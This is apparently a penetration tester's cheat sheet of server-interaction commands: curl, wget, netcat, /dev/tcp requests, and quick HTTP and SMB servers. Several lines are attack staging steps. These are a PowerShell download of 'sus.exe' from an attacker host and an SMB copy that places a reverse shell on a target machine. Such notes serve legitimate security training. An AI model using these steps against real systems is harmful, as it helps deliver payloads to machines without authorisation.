# Server Interactions ## Interact with Servers

Command	Description
`curl -v http://<ip>`	Access a website
`curl -X POST http://website -d 'username=user&password=pa$$word'`	Use POST method to login to website
`curl -o stuff.html http://website/stuff.html`	Save to file
`wget https://website.com/file.txt`	Pull specified file
`wget -r http://<ip>`	Download all files recursively
`wget -r ftp://<ip>`	Download the files from FTP server
`ftp <ip>`	Connect to FTP
`sftp <ip>`	Secure FTP
`powershell -c wget http://<localIP>:8080/sus.exe -outfile sus.exe`	Download from URL

Send Cookie settings with data, then pipe results: {% code overflow="wrap" %} ```bash curl 'website' -H 'Cookie: name=user; settings=1,2,3,4,5,6,7' --data 'name=User' | base64 -d > item.png ``` {% endcode %} Connect and send HTTP Request. ```bash nc www.example.com 80 ``` This will take you to a blank line. \ This means you are connected but will display nothing until you send a HTTP request ```bash GET / HTTP/1.1 ``` OR ```bash GET / ``` Interact with a webpage using /dev/tcp: {% code overflow="wrap" %} ``` exec 3<>/dev/tcp/www.google.com/80 echo -e "GET / HTTP/1.1\r\nhost: http://www.google.com\r\nConnection: close\r\n\r\n" >&3 cat <&3 ``` {% endcode %} ## Create a Server ### Python | `python3 -m http.server` | Creates a Python HTTP server | | ---------------------------------------------------------------- | ---------------------------- | | `python3 -m SimpleHTTPServer` | Creates a Python HTTP server | There is no indexing with this method. You need to know exact file location when pulling a file. ### Updog | `updog` | Serve from your current dir | | -------------------------------------------------------------- | --------------------------- | | `updog -d /dir` | Serve from another dir | | `updog -p 1234` | Serve from port 1234 | | `updog --password pa$$word` | Password protect the page | | `Updog --ssl` | Use an SSL connection | | `pip3 install updog` | Install Updog | Note: updog uses HTTP basic authentication. To login, you should leave the username blank and just enter the password in the password field. ### Netcat #### Serve a basic webpage

Command	Description
`nc -lp 1234 < index.html`	This will serve the page only once then quit
`while true; do nc -lp 8080 < index.html; done`	This will keep it up until you stop it

#### Pulling a webpage Connect and send HTTP Request. ```bash nc www.example.com 80 ``` This will take you to a blank line. This means you are connected but will display nothing until you send a HTTP request ```bash GET / HTTP/1.1 ``` OR ```bash GET / ``` ### SMB server ```bash sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py . ``` Transfer to windows using SMB. Put your reverse shell in the pwd and run this on the target: ```bash copy \\10.10.10.1\\sus.exe C:\sus.exe ```